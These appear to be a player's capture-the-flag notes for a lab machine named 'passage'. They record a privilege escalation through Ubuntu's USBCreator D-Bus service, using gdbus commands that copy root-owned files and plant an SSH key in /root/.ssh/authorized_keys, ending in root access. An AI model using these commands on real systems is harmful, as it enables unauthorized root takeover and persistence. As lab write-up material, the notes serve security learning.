nadav@passage:/tmp$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf<!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN" "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd"><busconfig><!-- Only root can own the service --> <policyuser="root"> <allowown="com.ubuntu.USBCreator"/> </policy><!-- Allow anyone to invoke methods (further constrained by PolicyKit privileges --> <policycontext="default"> <allowsend_destination="com.ubuntu.USBCreator"send_interface="com.ubuntu.USBCreator"/> <allowsend_destination="com.ubuntu.USBCreator"send_interface="org.freedesktop.DBus.Introspectable"/> <allowsend_destination="com.ubuntu.USBCreator"send_interface="org.freedesktop.DBus.Properties"/> </policy></busconfig>
https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation#python
# tried the python method; didn't work
Using https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
# the final image shows we can use dbus com.ubuntu.USBCreator.Image method to copy privileged files without password
# gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image 'source-file' 'dest-file' true
nadav@passage:~/.ssh$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image '/root/root.txt' '/home/nadav/root.txt' true
()
# works
# putting nadav's authorized_keys in /root/.ssh
nadav@passage:~/.ssh$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image '/home/nadav/.ssh/authorized_keys' '/root/.ssh/authorized_keys' true
()
# we can ssh in as root using nadav's id_rsa
$ ssh -i nadav_id_rsa root@10.10.10.206 130 ⨯
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)